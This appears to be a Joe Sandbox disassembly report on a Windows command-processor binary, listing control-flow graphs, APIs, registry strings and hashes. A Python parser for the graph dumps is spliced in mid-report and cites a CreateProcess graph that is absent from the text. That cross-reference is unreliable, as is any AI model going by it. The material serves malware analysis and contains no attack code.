                                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                      • Instruction ID: 9b4e86260509a5bce545c06528ef87ae747cf0a7992c602a34ff19da5a651ee2
                                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                      • Instruction Fuzzy Hash: B1F15D32A08B8295EB61EB11E4427BAF7A4FB89780F904537D94D42754DFBCE444CBA2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 579 7ff7e1dc5554-7ff7e1dc55b9 call 7ff7e1dca640 582 7ff7e1dc55bc-7ff7e1dc55e8 RegOpenKeyExW 579->582 583 7ff7e1dc5887-7ff7e1dc588e 582->583 584 7ff7e1dc55ee-7ff7e1dc5631 RegQueryValueExW 582->584 583->582 587 7ff7e1dc5894-7ff7e1dc58db time srand call 7ff7e1dc8f80 583->587 585 7ff7e1dc5637-7ff7e1dc5675 RegQueryValueExW 584->585 586 7ff7e1dcf248-7ff7e1dcf24d 584->586 588 7ff7e1dc5677-7ff7e1dc567c 585->588 589 7ff7e1dc568e-7ff7e1dc56cc RegQueryValueExW 585->589 591 7ff7e1dcf24f-7ff7e1dcf25b 586->591 592 7ff7e1dcf260-7ff7e1dcf265 586->592 593 7ff7e1dc5682-7ff7e1dc5687 588->593 594 7ff7e1dcf28b-7ff7e1dcf290 588->594 595 7ff7e1dc56d2-7ff7e1dc5710 RegQueryValueExW 589->595 596 7ff7e1dcf2b6-7ff7e1dcf2bb 589->596 591->585 592->585 598 7ff7e1dcf26b-7ff7e1dcf286 _wtol 592->598 593->589 594->589 601 7ff7e1dcf296-7ff7e1dcf2b1 _wtol 594->601 599 7ff7e1dc5712-7ff7e1dc5717 595->599 600 7ff7e1dc5729-7ff7e1dc5767 RegQueryValueExW 595->600 602 7ff7e1dcf2bd-7ff7e1dcf2c9 596->602 603 7ff7e1dcf2ce-7ff7e1dcf2d3 596->603 598->585 605 7ff7e1dc571d-7ff7e1dc5722 599->605 606 7ff7e1dcf2f9-7ff7e1dcf2fe 599->606 607 7ff7e1dc579f-7ff7e1dc57dd RegQueryValueExW 600->607 608 7ff7e1dc5769-7ff7e1dc576e 600->608 601->589 602->595 603->595 604 7ff7e1dcf2d9-7ff7e1dcf2f4 _wtol 603->604 604->595 605->600 606->600 609 7ff7e1dcf304-7ff7e1dcf31a wcstol 606->609 612 7ff7e1dc57e3-7ff7e1dc57e8 607->612 613 7ff7e1dcf3a9 607->613 610 7ff7e1dcf320-7ff7e1dcf325 608->610 611 7ff7e1dc5774-7ff7e1dc578f 608->611 609->610 614 7ff7e1dcf34b 610->614 615 7ff7e1dcf327-7ff7e1dcf33f wcstol 610->615 616 7ff7e1dc5795-7ff7e1dc5799 611->616 617 7ff7e1dcf357-7ff7e1dcf35e 611->617 618 7ff7e1dcf363-7ff7e1dcf368 612->618 619 7ff7e1dc57ee-7ff7e1dc5809 612->619 620 7ff7e1dcf3b5-7ff7e1dcf3b8 613->620 614->617 615->614 616->607 616->617 617->607 621 7ff7e1dcf38e 618->621 622 7ff7e1dcf36a-7ff7e1dcf382 wcstol 618->622 623 7ff7e1dc580f-7ff7e1dc5813 619->623 624 7ff7e1dcf39a-7ff7e1dcf39d 619->624 625 7ff7e1dcf3be-7ff7e1dcf3c5 620->625 626 7ff7e1dc582c 620->626 621->624 622->621 623->624 627 7ff7e1dc5819-7ff7e1dc5823 623->627 624->613 629 7ff7e1dc5832-7ff7e1dc5870 RegQueryValueExW 625->629 626->629 630 7ff7e1dcf3ca-7ff7e1dcf3d1 626->630 627->620 628 7ff7e1dc5829 627->628 628->626 631 7ff7e1dc5876-7ff7e1dc5882 RegCloseKey 629->631 632 7ff7e1dcf3dd-7ff7e1dcf3e2 629->632 630->632 631->583 633 7ff7e1dcf433-7ff7e1dcf439 632->633 634 7ff7e1dcf3e4-7ff7e1dcf412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff7e1dcf43f-7ff7e1dcf44c call 7ff7e1dbb900 633->635 636 7ff7e1dcf414-7ff7e1dcf426 call 7ff7e1dc13e0 634->636 637 7ff7e1dcf428 634->637 635->631 640 7ff7e1dcf42e 636->640 637->640 640->633
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpensrandtime
                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                      • API String ID: 145004033-3846321370
                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                      • Instruction ID: 77d591e3446ce0f2fca22fb1cff1ccbbca039bd77c76ae0072d5dfcad2d33457
                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                      • Instruction Fuzzy Hash: CCE19632A1DA82D6EB50EB10E4417BAF7A0FB88741FC05537E58E42A58DFBCD544CB62

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 821 7ff7e1dc37d8-7ff7e1dc3887 GetCurrentThreadId OpenThread call 7ff7e1dc04f4 HeapSetInformation RegOpenKeyExW 824 7ff7e1dce9f8-7ff7e1dcea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7e1dc388d-7ff7e1dc38eb call 7ff7e1dc5920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7e1dcea41-7ff7e1dcea59 GetThreadLocale 824->827 825->827 831 7ff7e1dc38f1-7ff7e1dc3913 memset 825->831 829 7ff7e1dcea74-7ff7e1dcea77 827->829 830 7ff7e1dcea5b-7ff7e1dcea67 827->830 834 7ff7e1dcea94-7ff7e1dcea96 829->834 835 7ff7e1dcea79-7ff7e1dcea7d 829->835 830->829 832 7ff7e1dceaa5 831->832 833 7ff7e1dc3919-7ff7e1dc3935 call 7ff7e1dc4d5c 831->833 838 7ff7e1dceaa8-7ff7e1dceab4 832->838 842 7ff7e1dceae2-7ff7e1dceaff call 7ff7e1db3240 call 7ff7e1dd8530 call 7ff7e1dc4c1c 833->842 843 7ff7e1dc393b-7ff7e1dc3942 833->843 834->832 835->834 837 7ff7e1dcea7f-7ff7e1dcea89 835->837 837->834 838->833 840 7ff7e1dceaba-7ff7e1dceac3 838->840 841 7ff7e1dceacb-7ff7e1dceace 840->841 844 7ff7e1dceac5-7ff7e1dceac9 841->844 845 7ff7e1dcead0-7ff7e1dceadb 841->845 853 7ff7e1dceb00-7ff7e1dceb0d 842->853 847 7ff7e1dc3948-7ff7e1dc3962 _setjmp 843->847 848 7ff7e1dceb27-7ff7e1dceb40 _setjmp 843->848 844->841 845->838 851 7ff7e1dceadd 845->851 847->853 854 7ff7e1dc3968-7ff7e1dc396d 847->854 849 7ff7e1dceb46-7ff7e1dceb49 848->849 850 7ff7e1dc39fe-7ff7e1dc3a05 call 7ff7e1dc4c1c 848->850 856 7ff7e1dceb66-7ff7e1dceb6f call 7ff7e1dc01b8 849->856 857 7ff7e1dceb4b-7ff7e1dceb65 call 7ff7e1db3240 call 7ff7e1dd8530 call 7ff7e1dc4c1c 849->857 850->824 851->833 867 7ff7e1dceb15-7ff7e1dceb1f call 7ff7e1dc4c1c 853->867 859 7ff7e1dc396f 854->859 860 7ff7e1dc39b9-7ff7e1dc39bb 854->860 880 7ff7e1dceb71-7ff7e1dceb82 _setmode 856->880 881 7ff7e1dceb87-7ff7e1dceb89 call 7ff7e1dc86f0 856->881 857->856 868 7ff7e1dc3972-7ff7e1dc397d 859->868 863 7ff7e1dc39c1-7ff7e1dc39c3 call 7ff7e1dc4c1c 860->863 864 7ff7e1dceb20 860->864 877 7ff7e1dc39c8 863->877 864->848 867->864 874 7ff7e1dc397f-7ff7e1dc3984 868->874 875 7ff7e1dc39c9-7ff7e1dc39de call 7ff7e1dbdf60 868->875 874->868 883 7ff7e1dc3986-7ff7e1dc39ae call 7ff7e1dc0580 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 874->883 875->867 891 7ff7e1dc39e4-7ff7e1dc39e8 875->891 877->875 880->881 888 7ff7e1dceb8e-7ff7e1dcebad call 7ff7e1dc58e4 call 7ff7e1dbdf60 881->888 897 7ff7e1dc39b3 883->897 902 7ff7e1dcebaf-7ff7e1dcebb3 888->902 891->850 895 7ff7e1dc39ea-7ff7e1dc39ef call 7ff7e1dbbe00 891->895 900 7ff7e1dc39f4-7ff7e1dc39fc 895->900 897->860 900->874 902->850 903 7ff7e1dcebb9-7ff7e1dcec24 call 7ff7e1dc58e4 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 call 7ff7e1dbbe00 call 7ff7e1dc0580 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 902->903 903->888
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                      • API String ID: 2624720099-1920437939
                                                      • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                      • Instruction ID: 47d1fd29b5b00acabf864d9dbf6b996e61c36cb48728def3869b3f6a398cf110
                                                      • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                      • Instruction Fuzzy Hash: 4CC1E071F086429AF714FB6498423BDFAA0FF49744FC4853BD90E86695DEBCA440C7A2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1118 7ff7e1dc823c-7ff7e1dc829b FindFirstFileExW 1119 7ff7e1dc82cd-7ff7e1dc82df 1118->1119 1120 7ff7e1dc829d-7ff7e1dc82a9 GetLastError 1118->1120 1124 7ff7e1dc8365-7ff7e1dc837b FindNextFileW 1119->1124 1125 7ff7e1dc82e5-7ff7e1dc82ee 1119->1125 1121 7ff7e1dc82af 1120->1121 1123 7ff7e1dc82b1-7ff7e1dc82cb 1121->1123 1127 7ff7e1dc83d0-7ff7e1dc83e5 FindClose 1124->1127 1128 7ff7e1dc837d-7ff7e1dc8380 1124->1128 1126 7ff7e1dc82f1-7ff7e1dc82f4 1125->1126 1130 7ff7e1dc82f6-7ff7e1dc8300 1126->1130 1131 7ff7e1dc8329-7ff7e1dc832b 1126->1131 1127->1126 1128->1119 1129 7ff7e1dc8386 1128->1129 1129->1120 1132 7ff7e1dc8332-7ff7e1dc8353 GetProcessHeap HeapAlloc 1130->1132 1133 7ff7e1dc8302-7ff7e1dc830e 1130->1133 1131->1121 1134 7ff7e1dc832d 1131->1134 1137 7ff7e1dc8356-7ff7e1dc8363 1132->1137 1135 7ff7e1dc8310-7ff7e1dc8313 1133->1135 1136 7ff7e1dc838b-7ff7e1dc83c2 GetProcessHeap HeapReAlloc 1133->1136 1134->1120 1140 7ff7e1dc8315-7ff7e1dc8323 1135->1140 1141 7ff7e1dc8327 1135->1141 1138 7ff7e1dd50f8-7ff7e1dd511e GetLastError FindClose 1136->1138 1139 7ff7e1dc83c8-7ff7e1dc83ce 1136->1139 1137->1135 1138->1123 1139->1137 1140->1141 1141->1131
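The control_flow_graph text above is the node and edge list the Joe Sandbox IDA plugin emits for each function: an integer node id followed by the basic block's address range, then the API names and internal call targets attributed to that block, with `src->dst` edges interleaved. The parser below is an added example, not part of this report or of Joe Sandbox's tooling. It takes the FindFirstFileExW graph above verbatim as input, rebuilds the blocks and adjacency, and answers the two questions an analyst usually has when reading these dumps: which blocks invoke a given API, and how the entry block reaches one of them. A second, constructed snippet (addresses made up) exercises the `call <addr>` and `<api> * N` label forms that appear in the other graphs on this page.

```python
"""Parse Joe Sandbox IDA-plugin control_flow_graph dumps (node id, address range,
API/call labels, id->id edges) and answer two triage questions: which basic
blocks call a given API, and how the function's entry block reaches one of them."""
from __future__ import annotations

import re
from collections import deque
from dataclasses import dataclass, field

# Copied verbatim from the report's FindFirstFileExW graph (function 7ff7e1dc823c).
JOE_CFG_TEXT = (
    "control_flow_graph 1118 7ff7e1dc823c-7ff7e1dc829b FindFirstFileExW 1119 7ff7e1dc82cd-7ff7e1dc82df "
    "1118->1119 1120 7ff7e1dc829d-7ff7e1dc82a9 GetLastError 1118->1120 1124 7ff7e1dc8365-7ff7e1dc837b "
    "FindNextFileW 1119->1124 1125 7ff7e1dc82e5-7ff7e1dc82ee 1119->1125 1121 7ff7e1dc82af 1120->1121 "
    "1123 7ff7e1dc82b1-7ff7e1dc82cb 1121->1123 1127 7ff7e1dc83d0-7ff7e1dc83e5 FindClose 1124->1127 "
    "1128 7ff7e1dc837d-7ff7e1dc8380 1124->1128 1126 7ff7e1dc82f1-7ff7e1dc82f4 1125->1126 "
    "1130 7ff7e1dc82f6-7ff7e1dc8300 1126->1130 1131 7ff7e1dc8329-7ff7e1dc832b 1126->1131 1127->1126 "
    "1128->1119 1129 7ff7e1dc8386 1128->1129 1129->1120 1132 7ff7e1dc8332-7ff7e1dc8353 GetProcessHeap "
    "HeapAlloc 1130->1132 1133 7ff7e1dc8302-7ff7e1dc830e 1130->1133 1131->1121 1134 7ff7e1dc832d "
    "1131->1134 1137 7ff7e1dc8356-7ff7e1dc8363 1132->1137 1135 7ff7e1dc8310-7ff7e1dc8313 1133->1135 "
    "1136 7ff7e1dc838b-7ff7e1dc83c2 GetProcessHeap HeapReAlloc 1133->1136 1134->1120 "
    "1140 7ff7e1dc8315-7ff7e1dc8323 1135->1140 1141 7ff7e1dc8327 1135->1141 "
    "1138 7ff7e1dd50f8-7ff7e1dd511e GetLastError FindClose 1136->1138 1139 7ff7e1dc83c8-7ff7e1dc83ce "
    "1136->1139 1137->1135 1138->1123 1139->1137 1140->1141 1141->1131"
)

# Constructed snippet (not from the report; addresses are made up) exercising the
# "call <addr>" and "<api> * N" label forms seen in the report's other graphs.
CONSTRUCTED_CFG_TEXT = (
    "control_flow_graph 1 7ff700001000-7ff700001040 memset * 2 call 7ff700002000 "
    "GetStartupInfoW 2 7ff700001046-7ff700001060 CreateProcessW 1->2"
)

_ADDR = re.compile(r"^[0-9a-f]{6,}(?:-[0-9a-f]{6,})?$")  # "<start>" or "<start>-<end>"
_EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    node: int
    start: str
    end: str
    apis: list[str] = field(default_factory=list)   # imported API names on the block
    calls: list[str] = field(default_factory=list)  # internal "call <addr>" targets


@dataclass
class Graph:
    blocks: dict[int, Block]
    succ: dict[int, list[int]]  # adjacency, edge order preserved
    entry: int                  # first node listed is the function's entry block


def parse_cfg(text: str) -> Graph:
    toks = text.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph dump")
    blocks: dict[int, Block] = {}
    succ: dict[int, list[int]] = {}
    cur: Block | None = None
    i = 1
    while i < len(toks):
        tok = toks[i]
        if m := _EDGE.match(tok):
            succ.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            i += 1
        elif tok.isdigit() and i + 1 < len(toks) and _ADDR.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")  # node definition: "<id> <start>[-<end>]"
            cur = blocks[int(tok)] = Block(int(tok), lo, hi or lo)
            i += 2
        elif cur is None:
            raise ValueError(f"label {tok!r} before any node")
        elif tok == "call" and i + 1 < len(toks) and _ADDR.match(toks[i + 1]):
            cur.calls.append(toks[i + 1])
            i += 2
        elif tok == "*" and i + 1 < len(toks) and toks[i + 1].isdigit() and cur.apis:
            cur.apis.extend([cur.apis[-1]] * (int(toks[i + 1]) - 1))  # "memset * 2"
            i += 2
        else:
            cur.apis.append(tok)
            i += 1
    if not blocks:
        raise ValueError("no basic blocks found")
    return Graph(blocks, succ, next(iter(blocks)))


def blocks_calling(g: Graph, api: str) -> list[int]:
    """Sorted node ids of every block whose label names `api`."""
    return sorted(n for n, b in g.blocks.items() if api in b.apis)


def shortest_path(g: Graph, src: int, dst: int) -> list[int] | None:
    """BFS over the CFG; None if dst is unreachable from src."""
    prev: dict[int, int | None] = {src: None}
    queue = deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            path = [n]
            while prev[path[-1]] is not None:
                path.append(prev[path[-1]])
            return path[::-1]
        for s in g.succ.get(n, []):
            if s not in prev:
                prev[s] = n
                queue.append(s)
    return None
```

Run against the graph above, `blocks_calling(g, "FindClose")` returns nodes 1127 and 1138, and `shortest_path(g, g.entry, 1138)` shows that the error-path FindClose at 7ff7e1dd50f8 is reached only through the HeapReAlloc block, which is what the `GetLastError FindClose` label on 1138 suggests. The same two calls applied to the CreateProcessW/CreateProcessAsUserW graph on this page give the path from the function entry to each launch site. The parser keys on the dump's own token shapes, so a label that is itself a decimal number immediately followed by a hex address would be misread as a node definition; the dumps in this report contain none.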
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileFindFirstLast
                                                      • String ID:
                                                      • API String ID: 873889042-0
                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                      • Instruction ID: 158bb9ef9b0325c1935fa0e7ccece0d372344554734bac7449e1d756c1d438cb
                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                      • Instruction Fuzzy Hash: 70516D71A09B4686E700EF11E445779FBA1FB49B82F859532CA1D43354CFBCE464CB61

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1142 7ff7e1dc2978-7ff7e1dc29b6 1143 7ff7e1dc29b9-7ff7e1dc29c1 1142->1143 1143->1143 1144 7ff7e1dc29c3-7ff7e1dc29c5 1143->1144 1145 7ff7e1dce441 1144->1145 1146 7ff7e1dc29cb-7ff7e1dc29cf 1144->1146 1147 7ff7e1dc29d2-7ff7e1dc29da 1146->1147 1148 7ff7e1dc2a1e-7ff7e1dc2a3e FindFirstFileW 1147->1148 1149 7ff7e1dc29dc-7ff7e1dc29e1 1147->1149 1150 7ff7e1dce435-7ff7e1dce439 1148->1150 1151 7ff7e1dc2a44-7ff7e1dc2a5c FindClose 1148->1151 1149->1148 1152 7ff7e1dc29e3-7ff7e1dc29eb 1149->1152 1150->1145 1153 7ff7e1dc2a62-7ff7e1dc2a6e 1151->1153 1154 7ff7e1dc2ae3-7ff7e1dc2ae5 1151->1154 1152->1147 1155 7ff7e1dc29ed-7ff7e1dc2a1c call 7ff7e1dc8f80 1152->1155 1156 7ff7e1dc2a70-7ff7e1dc2a78 1153->1156 1157 7ff7e1dce3f7-7ff7e1dce3ff 1154->1157 1158 7ff7e1dc2aeb-7ff7e1dc2b10 _wcsnicmp 1154->1158 1156->1156 1160 7ff7e1dc2a7a-7ff7e1dc2a8d 1156->1160 1158->1153 1161 7ff7e1dc2b16-7ff7e1dce3f1 _wcsicmp 1158->1161 1160->1145 1163 7ff7e1dc2a93-7ff7e1dc2a97 1160->1163 1161->1153 1161->1157 1165 7ff7e1dce404-7ff7e1dce407 1163->1165 1166 7ff7e1dc2a9d-7ff7e1dc2ade memmove call 7ff7e1dc13e0 1163->1166 1168 7ff7e1dce40b-7ff7e1dce413 1165->1168 1166->1152 1168->1168 1170 7ff7e1dce415-7ff7e1dce42b memmove 1168->1170 1170->1150
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                      • Instruction ID: ec894e96bb4b6e7506576d69eb1ec3dc8df868198d466ed4926a31adc3a0c872
                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                      • Instruction Fuzzy Hash: 0F510462B0868285EB30EB15A9463BAE690FB84BE4FC44632DE6E476D0DF7CE441C651

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 643 7ff7e1dc4d5c-7ff7e1dc4e4b InitializeCriticalSection call 7ff7e1dc58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7e1dc0580 call 7ff7e1dc4a14 call 7ff7e1dc4ad0 call 7ff7e1dc5554 GetCommandLineW 654 7ff7e1dc4e4d-7ff7e1dc4e54 643->654 654->654 655 7ff7e1dc4e56-7ff7e1dc4e61 654->655 656 7ff7e1dc51cf-7ff7e1dc51e3 call 7ff7e1db3278 call 7ff7e1dc4c1c 655->656 657 7ff7e1dc4e67-7ff7e1dc4e7b call 7ff7e1dc2e44 655->657 662 7ff7e1dc4e81-7ff7e1dc4ec3 GetCommandLineW call 7ff7e1dc13e0 call 7ff7e1dbca40 657->662 663 7ff7e1dc51ba-7ff7e1dc51ce call 7ff7e1db3278 call 7ff7e1dc4c1c 657->663 662->663 674 7ff7e1dc4ec9-7ff7e1dc4ee8 call 7ff7e1dc417c call 7ff7e1dc2394 662->674 663->656 678 7ff7e1dc4eed-7ff7e1dc4ef5 674->678 678->678 679 7ff7e1dc4ef7-7ff7e1dc4f1f call 7ff7e1dbaa54 678->679 682 7ff7e1dc4f21-7ff7e1dc4f30 679->682 683 7ff7e1dc4f95-7ff7e1dc4fee GetConsoleOutputCP GetCPInfo call 7ff7e1dc51ec GetProcessHeap HeapAlloc 679->683 682->683 685 7ff7e1dc4f32-7ff7e1dc4f39 682->685 689 7ff7e1dc5012-7ff7e1dc5018 683->689 690 7ff7e1dc4ff0-7ff7e1dc5006 GetConsoleTitleW 683->690 685->683 687 7ff7e1dc4f3b-7ff7e1dc4f77 call 7ff7e1db3278 GetWindowsDirectoryW 685->687 695 7ff7e1dc51b1-7ff7e1dc51b9 call 7ff7e1dc4c1c 687->695 696 7ff7e1dc4f7d-7ff7e1dc4f90 call 7ff7e1dc3c24 687->696 693 7ff7e1dc507a-7ff7e1dc507e 689->693 694 7ff7e1dc501a-7ff7e1dc5024 call 7ff7e1dc3578 689->694 690->689 692 7ff7e1dc5008-7ff7e1dc500f 690->692 692->689 697 7ff7e1dc5080-7ff7e1dc50b3 call 7ff7e1ddb89c call 7ff7e1db586c call 7ff7e1db3240 call 7ff7e1dc3448 693->697 698 7ff7e1dc50eb-7ff7e1dc5161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 709 7ff7e1dc5026-7ff7e1dc5030 694->709 695->663 696->683 724 7ff7e1dc50d2-7ff7e1dc50d7 call 7ff7e1db3278 697->724 725 7ff7e1dc50b5-7ff7e1dc50d0 call 7ff7e1dc3448 * 2 697->725 702 7ff7e1dc516f 698->702 703 7ff7e1dc5163-7ff7e1dc5167 698->703 708 7ff7e1dc5172-7ff7e1dc51af free call 7ff7e1dc8f80 702->708 703->702 707 7ff7e1dc5169-7ff7e1dc516d 703->707 707->702 707->708 713 7ff7e1dc5032-7ff7e1dc5059 GetStdHandle GetConsoleScreenBufferInfo 709->713 714 7ff7e1dc5075 call 7ff7e1ddcff0 709->714 718 7ff7e1dc5069-7ff7e1dc5073 713->718 719 7ff7e1dc505b-7ff7e1dc5067 713->719 714->693 718->693 718->714 719->693 728 7ff7e1dc50dc-7ff7e1dc50e6 GlobalFree 724->728 725->728 728->698
                                                      APIs
                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4D9A
                                                        • Part of subcall function 00007FF7E1DC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7E1DDC6DB), ref: 00007FF7E1DC58EF
                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4DBB
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC4DCA
                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4DE0
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC4DEE
                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E04
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC0589
                                                        • Part of subcall function 00007FF7E1DC0580: SetConsoleMode.KERNELBASE ref: 00007FF7E1DC059E
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC05AF
                                                        • Part of subcall function 00007FF7E1DC0580: GetConsoleMode.KERNELBASE ref: 00007FF7E1DC05C5
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC05EF
                                                        • Part of subcall function 00007FF7E1DC0580: GetConsoleMode.KERNELBASE ref: 00007FF7E1DC0605
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC0632
                                                        • Part of subcall function 00007FF7E1DC0580: SetConsoleMode.KERNELBASE ref: 00007FF7E1DC0647
                                                        • Part of subcall function 00007FF7E1DC4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                        • Part of subcall function 00007FF7E1DC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                        • Part of subcall function 00007FF7E1DC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
